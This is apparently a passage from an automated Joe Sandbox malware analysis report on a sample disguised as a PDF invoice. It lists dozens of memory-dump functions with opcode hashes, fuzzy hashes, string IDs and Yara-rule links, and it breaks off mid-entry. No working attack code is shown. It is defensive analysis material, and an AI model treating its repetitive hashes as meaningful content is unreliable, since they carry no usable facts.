                                                                                      • Instruction Fuzzy Hash: 733113B4E242089FDB44DF9AD8446AEBBF2FB89300F208069D914A7345DB355956CFA0
                                                                                      Function 06760D80 Relevance: 1.3, Strings: 1, Instructions: 88COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'sq
                                                                                      • API String ID: 0-1075809040
                                                                                      • Opcode ID: 41f0a173cae76cd0110f84762c669721900aa1aa2b24d087c27d4cd27de5bbca
                                                                                      • Instruction ID: 120f9cfd44589322e8fd38c2766d38bdd06f42072a8c51d053cfeb302261c721
                                                                                      • Opcode Fuzzy Hash: 41f0a173cae76cd0110f84762c669721900aa1aa2b24d087c27d4cd27de5bbca
                                                                                      • Instruction Fuzzy Hash: 2D21A3357001049FCF459FA5D8549AEBBB6FF8C310B1550A8EA0A9B361CA31EC16DB90
                                                                                      Function 0676F3E8 Relevance: 1.3, Strings: 1, Instructions: 88COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: 9d7e779f5529e81d85dd9d8ac19cd5b7acece61cf55d76fd93d048b45e0ad608
                                                                                      • Instruction ID: 844db99d4daca1e6638f540e281e65d1d64d08912aabb0df51a523eaeca794fe
                                                                                      • Opcode Fuzzy Hash: 9d7e779f5529e81d85dd9d8ac19cd5b7acece61cf55d76fd93d048b45e0ad608
                                                                                      • Instruction Fuzzy Hash: D9313670E05209CFDB44CFAAE544AEEBBF6FB89300F109029E918A3304D7785A45CFA0
                                                                                      Function 06765999 Relevance: 1.3, Strings: 1, Instructions: 88COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'sq
                                                                                      • API String ID: 0-1075809040
                                                                                      • Opcode ID: 7ae07d35e44c67dcd42245dda30e35a778a4373226493fcab08d65a281201727
                                                                                      • Instruction ID: 18c80f828c40e423602b7f302cb11bdae6d37db8235e57d1fb8e2c0a4cc7ca31
                                                                                      • Opcode Fuzzy Hash: 7ae07d35e44c67dcd42245dda30e35a778a4373226493fcab08d65a281201727
                                                                                      • Instruction Fuzzy Hash: 1821EB30B002148BDB95AB6AD8696BEBBABAFC4700F50402DF507EB395CF709C05D7A1
                                                                                      Function 066A8394 Relevance: 1.3, Strings: 1, Instructions: 87COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: d0ed8fcb320e5ccb91155ca37cd97e3a9bc14a8ab34da440cc972f8cbe871b69
                                                                                      • Instruction ID: 18dcd9598f013561ea1e707eb70c4ec8a9e605d678715a6f282755838d76ab1f
                                                                                      • Opcode Fuzzy Hash: d0ed8fcb320e5ccb91155ca37cd97e3a9bc14a8ab34da440cc972f8cbe871b69
                                                                                      • Instruction Fuzzy Hash: 823100B0A06318CFEBA4DF99C944BAEB7F6FB4A300F205169C409A7255C7746D92CF54
                                                                                      Function 066A9278 Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: 4bdd0203f0ec9b4520b39daa3b2ed4d4737a7ea0d7ef1075fce4b2873cfe7f5a
                                                                                      • Instruction ID: 8a7d78e9ac52a9d12ced3f9465a1aa4a0a745e2e53196186cb4740430669ee30
                                                                                      • Opcode Fuzzy Hash: 4bdd0203f0ec9b4520b39daa3b2ed4d4737a7ea0d7ef1075fce4b2873cfe7f5a
                                                                                      • Instruction Fuzzy Hash: 1F3113B4E20208CFDB44DF9AC8446EEBBF2FB89300F208069D519A7344DB355A52CF90
                                                                                      Function 00D73044 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2208167105.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: 51942ebcc47a681f1e6da2f161127fa8d6a9dc570e7b1433372350c1c609a500
                                                                                      • Instruction ID: 43cdc40ffbd94775f821ea650073b58e581d39e58bda7df52337067f1fd87175
                                                                                      • Opcode Fuzzy Hash: 51942ebcc47a681f1e6da2f161127fa8d6a9dc570e7b1433372350c1c609a500
                                                                                      • Instruction Fuzzy Hash: 93314870904348DFDB10DFA9E9487ADBBF4EF4A304F2480AAC449E3251E7788A85DF25
                                                                                      Function 066A8C82 Relevance: 1.3, Strings: 1, Instructions: 79COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: j
                                                                                      • API String ID: 0-2137352139
                                                                                      • Opcode ID: 13d025250f2aa50c1eb766b5759e93ab009b961e88c48992c7eec8abbc7d6e69
                                                                                      • Instruction ID: d7ac6e5ebe140690e494065283ea32b53df612f466716c0bcbbb3e270b5bc3ed
                                                                                      • Opcode Fuzzy Hash: 13d025250f2aa50c1eb766b5759e93ab009b961e88c48992c7eec8abbc7d6e69
                                                                                      • Instruction Fuzzy Hash: 972155309093859FD752CB6AC819785FF62BB02314F0883DEE6495B282C27188D0CF91
                                                                                      Function 065C1FF4 Relevance: 1.3, Strings: 1, Instructions: 79COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: 0f4844403965fd0542e024f0214ae3131d5f82de22888955ae39c2b44815b10d
                                                                                      • Instruction ID: 7ddb94a5f3503ae51eae1039394cb5f48dae0edaf381f7a8fc57f714178c4e38
                                                                                      • Opcode Fuzzy Hash: 0f4844403965fd0542e024f0214ae3131d5f82de22888955ae39c2b44815b10d
                                                                                      • Instruction Fuzzy Hash: A3314A74A04108DFDB94EFE8D855BEDBBB1FB49321F60402AD502AB285C7315E85CFA1
                                                                                      Function 065C047C Relevance: 1.3, Strings: 1, Instructions: 74COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: b24458f1c7b1f16fb192da412336f34755692bc0d697d451dde539c92d4e6167
                                                                                      • Instruction ID: 140b47326202c2467c0fb1eefd405350a246dd7f5514f102eec86101c22aed65
                                                                                      • Opcode Fuzzy Hash: b24458f1c7b1f16fb192da412336f34755692bc0d697d451dde539c92d4e6167
                                                                                      • Instruction Fuzzy Hash: 28311374A05218CFEB60DF98D884BAABBB2FB4A710F0041A9D449A3384C7369EC4CF51
                                                                                      Function 065C039F Relevance: 1.3, Strings: 1, Instructions: 74COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: 052ae5be195b8a8d5d0ddcfb52f77a296453aecbb5d7bc308c0109e29c7c611d
                                                                                      • Instruction ID: 7963f8c8b6c92f7a82a9cd7c0722fab65cede53d5c26a5320fca92bd16fa3a24
                                                                                      • Opcode Fuzzy Hash: 052ae5be195b8a8d5d0ddcfb52f77a296453aecbb5d7bc308c0109e29c7c611d
                                                                                      • Instruction Fuzzy Hash: C2311374A05218CFEB60DF98D884BAABBB2FB4A710F0041A9D449A3384C7369EC4CF51
                                                                                      Function 065C6980 Relevance: 1.3, Strings: 1, Instructions: 70COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: 82f267a9f0ebf0a97ba9da0959f4ec9b8d393dbfddbbfca3d512b078ca15138f
                                                                                      • Instruction ID: cf1d69e41e34b836527da1db9e83432a467349fd088f1293dbb9603ecde49ace
                                                                                      • Opcode Fuzzy Hash: 82f267a9f0ebf0a97ba9da0959f4ec9b8d393dbfddbbfca3d512b078ca15138f
                                                                                      • Instruction Fuzzy Hash: DB21BD74A001099FCB00DBA8E845AEEBBB6EF89300F108169E504A7345DB315E45CFB1
                                                                                      Function 00D73068 Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2208167105.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: d4c832dbb91dca9335104c8170fa7787122ddc550e79c95304b10ce1a94d1cf2
                                                                                      • Instruction ID: a3abbdc561959c13dc7fd18b2376c6db23749a183bcff151bf8bb27bc783e3f2
                                                                                      • Opcode Fuzzy Hash: d4c832dbb91dca9335104c8170fa7787122ddc550e79c95304b10ce1a94d1cf2
                                                                                      • Instruction Fuzzy Hash: 2E2134B0904208DFDB10DFA9E5487AEBBF5EB49305F20C0AAD449E3350E7748A85EF25
                                                                                      Function 065C6990 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: f7cb173171cd99e942b7bbd71ccc7d698177d55afad355fe1cdbacc347b41d26
                                                                                      • Instruction ID: c750cac6b5c10e1ee5da452c3d3624088df5284e1443c0e741d706fa32355d16
                                                                                      • Opcode Fuzzy Hash: f7cb173171cd99e942b7bbd71ccc7d698177d55afad355fe1cdbacc347b41d26
                                                                                      • Instruction Fuzzy Hash: 47215974A0010A9BCB44EFA8E8546EEBBF2FF89310F108129E515B7344DB356E95CFA1
                                                                                      Function 06492210 Relevance: 1.3, APIs: 1, Instructions: 56memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • VirtualAlloc.KERNEL32(?,?,?,?), ref: 06492283
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2220839867.0000000006490000.00000040.00000800.00020000.00000000.sdmp, Offset: 06490000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6490000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 4275171209-0
                                                                                      • Opcode ID: e27c9988fb5901739db0b1f4c6030c82c60800bb7c71113de87623831a21613d
                                                                                      • Instruction ID: ff92495c296a99064724a4976f8dc2e4fd6c77a7f7847944f98169070c255fc1
                                                                                      • Opcode Fuzzy Hash: e27c9988fb5901739db0b1f4c6030c82c60800bb7c71113de87623831a21613d
                                                                                      • Instruction Fuzzy Hash: D21159B59002499FDB10DFAAC845BDFBFF5EF88320F24841AE519AB210C7759544CFA0
                                                                                      Function 06492218 Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • VirtualAlloc.KERNEL32(?,?,?,?), ref: 06492283
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2220839867.0000000006490000.00000040.00000800.00020000.00000000.sdmp, Offset: 06490000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6490000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 4275171209-0
                                                                                      • Opcode ID: 2a31ab53c011e4386f5676753a37f2358086a232de8d81db1192c26f75f52ea9
                                                                                      • Instruction ID: ae2d47c3855722d110507b14b606ae470f0f21f74a42ea4689d86586ef73d560
                                                                                      • Opcode Fuzzy Hash: 2a31ab53c011e4386f5676753a37f2358086a232de8d81db1192c26f75f52ea9
                                                                                      • Instruction Fuzzy Hash: F11107B59002499FDB10DFAAC845BDFBFF5EF98320F24841AD519AB250CB75A544CFA0
                                                                                      Function 066A71F8 Relevance: 1.3, Strings: 1, Instructions: 50COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: 6c79170cac3cbe3e65deeb7b24add2a962b93801edf97e4292fc2a4c1a8ec531
                                                                                      • Instruction ID: d8cf39c0f69a0e47e2d85766984e93372a3558ae839dff22f8208aa9e4f21160
                                                                                      • Opcode Fuzzy Hash: 6c79170cac3cbe3e65deeb7b24add2a962b93801edf97e4292fc2a4c1a8ec531
                                                                                      • Instruction Fuzzy Hash: 1C112375E00219DBCB04EFA8E4046EEBBF5FB88315F0040AAE514A3344D735AE55CBA0
                                                                                      Function 00D77793 Relevance: 1.3, Strings: 1, Instructions: 48COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2208167105.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: #
                                                                                      • API String ID: 0-1885708031
                                                                                      • Opcode ID: 9957907f27ec697f57c5c17fb907831c79476a93b27011fcc9e4bfb003afdd32
                                                                                      • Instruction ID: 9baa2a3be5b06802652c7e2a2a05b8a94ef8473d16caea96414b8857b1449b20
                                                                                      • Opcode Fuzzy Hash: 9957907f27ec697f57c5c17fb907831c79476a93b27011fcc9e4bfb003afdd32
                                                                                      • Instruction Fuzzy Hash: E021BF70D05228CBDB649F28DC48B98B7B1FB48301F1085EAD44DA3690EB746EC4CFA2
                                                                                      Function 066A71F2 Relevance: 1.3, Strings: 1, Instructions: 48COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: b2afb1b74a1342f5d045544654352d5ea7c7b1ace30251ac023f686c68c36f5e
                                                                                      • Instruction ID: ca70fee6519f3082548e4c7938b0349461be4a6659e411c442ed7555b6877b6b
                                                                                      • Opcode Fuzzy Hash: b2afb1b74a1342f5d045544654352d5ea7c7b1ace30251ac023f686c68c36f5e
                                                                                      • Instruction Fuzzy Hash: FA112374E00219DFCB14EFA8D404AEEBBF5EB89300F0040A9E914A3384D7756E45CBA1
                                                                                      Function 066A84E0 Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: 7b5665fc06927fd95c19eb289cc9c26f824f64a8d2b008413141d28b37edfb64
                                                                                      • Instruction ID: 163ab9ac3f96e1500fd54071bb620c685dfa4c5661219ccad5c99f72b3bc4ba6
                                                                                      • Opcode Fuzzy Hash: 7b5665fc06927fd95c19eb289cc9c26f824f64a8d2b008413141d28b37edfb64
                                                                                      • Instruction Fuzzy Hash: F3210374A002288FCB64EF64E8907DDBBB2FB99310F1080A9D559A7398CB301ED5CF60
                                                                                      Function 066A8018 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: 1b3a2f0c9921d3f808dd24be34fca147c141be4e9a0a37a71aaf77549ab5083b
                                                                                      • Instruction ID: 201892da82be528eb0c41794a091f1061492401e5acee44c94806851be1f719d
                                                                                      • Opcode Fuzzy Hash: 1b3a2f0c9921d3f808dd24be34fca147c141be4e9a0a37a71aaf77549ab5083b
                                                                                      • Instruction Fuzzy Hash: 44115B30A0630CDFEB94DF28D9447DEBAB2EB89311F0051A8E509A3390CB311E95CFA5
                                                                                      Function 069A200F Relevance: 1.3, Strings: 1, Instructions: 43COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2223664101.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_69a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: 018c7f681d2f73ad49025ec4999b5ed973ff829cf06c6e4097f0630e01e83b60
                                                                                      • Instruction ID: 193024057f1d479e349a6070ca3a80432ed164066d7496945ac8f5899b2f2865
                                                                                      • Opcode Fuzzy Hash: 018c7f681d2f73ad49025ec4999b5ed973ff829cf06c6e4097f0630e01e83b60
                                                                                      • Instruction Fuzzy Hash: 3211F378A01229CFDB64EF18D954AE9B7B6FB49308F0000E9E919E7745DB305EE19F60
                                                                                      Function 06502D19 Relevance: 1.3, Strings: 1, Instructions: 41COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221054323.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6500000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: V
                                                                                      • API String ID: 0-1342839628
                                                                                      • Opcode ID: 166eecf3c5fcb53c24d241126366dadb5f4812cf981e03a6f61e9f2b05d5a022
                                                                                      • Instruction ID: a04a77e86512b5bdc9d4a18e09617bd20e26401a2dcbfd25bf6c981a76e7cad1
                                                                                      • Opcode Fuzzy Hash: 166eecf3c5fcb53c24d241126366dadb5f4812cf981e03a6f61e9f2b05d5a022
                                                                                      • Instruction Fuzzy Hash: E611B374901228CFEBA4EF60DD50B99BBB2FB49300F1052D9C819A3355DB305E90DF50
                                                                                      Function 0650E8E0 Relevance: 1.3, Strings: 1, Instructions: 37COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221054323.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6500000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: 77407b466530ee17079e94b663fff3f8887c6f54786c4ad055599eec4154555b
                                                                                      • Instruction ID: 370de24d63600677b22d45c9d07ab66396481ae278863d1f22dba1ca1d3e8454
                                                                                      • Opcode Fuzzy Hash: 77407b466530ee17079e94b663fff3f8887c6f54786c4ad055599eec4154555b
                                                                                      • Instruction Fuzzy Hash: 9501A2B4E042199FCB84EFA8E5456AEBBF5FB49300F204569D919E3344EB305A51CFA1
                                                                                      Function 069A1D94 Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2223664101.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_69a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: 1d0f091eb8e356582e9c868105fa24b25bba900ba3afff797e4b0a42fcdda7b6
                                                                                      • Instruction ID: 3ca384fffee5c586be3e057e2cf8e02525667b5ec9b765da85db5d55a8b088ce
                                                                                      • Opcode Fuzzy Hash: 1d0f091eb8e356582e9c868105fa24b25bba900ba3afff797e4b0a42fcdda7b6
                                                                                      • Instruction Fuzzy Hash: EE11CC78A012288FCB94DF29E898AD9BBF1FB49304F1080E9D819A7344EB305EC4DF50
                                                                                      Function 066A8629 Relevance: 1.3, Strings: 1, Instructions: 34COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: 3ba0b92d09de6621a15563a4533dd7338b5ad6d0a49461a8383d762b0f3a0653
                                                                                      • Instruction ID: 867b252dfc5a60320a15ab3f2548c57f674458376806f203cfb40437a88c28bc
                                                                                      • Opcode Fuzzy Hash: 3ba0b92d09de6621a15563a4533dd7338b5ad6d0a49461a8383d762b0f3a0653
                                                                                      • Instruction Fuzzy Hash: 9A01F670E15218CFE764DF16D8407EDBBB2FB8A304F00A0699949A3354DB305C92CF10
                                                                                      Function 066A8895 Relevance: 1.3, Strings: 1, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: ec2801bbb2854ebc4c18c0b6256b83c8226be361aa031945003c7d38db4817f9
                                                                                      • Instruction ID: d55f7ba55474a25a606b9ad0058352d8f96e016ab985ab0ae8a89e9556f6622d
                                                                                      • Opcode Fuzzy Hash: ec2801bbb2854ebc4c18c0b6256b83c8226be361aa031945003c7d38db4817f9
                                                                                      • Instruction Fuzzy Hash: 1401F674A01218DFDB94DF19E888B9CBBB2FF89310F1081A8E509A7344DB305DC59F14
                                                                                      Function 066A82F4 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: 237f4e08e420d1bf2127857f9529e4bf2947d68aa5a8efc0c7abe87f975d7382
                                                                                      • Instruction ID: d01e0a2c472ef6aa672de3e846a2411640bf329ee5410bb6b3150e6901f21ccd
                                                                                      • Opcode Fuzzy Hash: 237f4e08e420d1bf2127857f9529e4bf2947d68aa5a8efc0c7abe87f975d7382
                                                                                      • Instruction Fuzzy Hash: 4D01E878A002288FC754DF65E85079DBBB2FB49310F0081AADA49B3344CB305ED5CF60
                                                                                      Function 066A86E2 Relevance: 1.3, Strings: 1, Instructions: 27COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
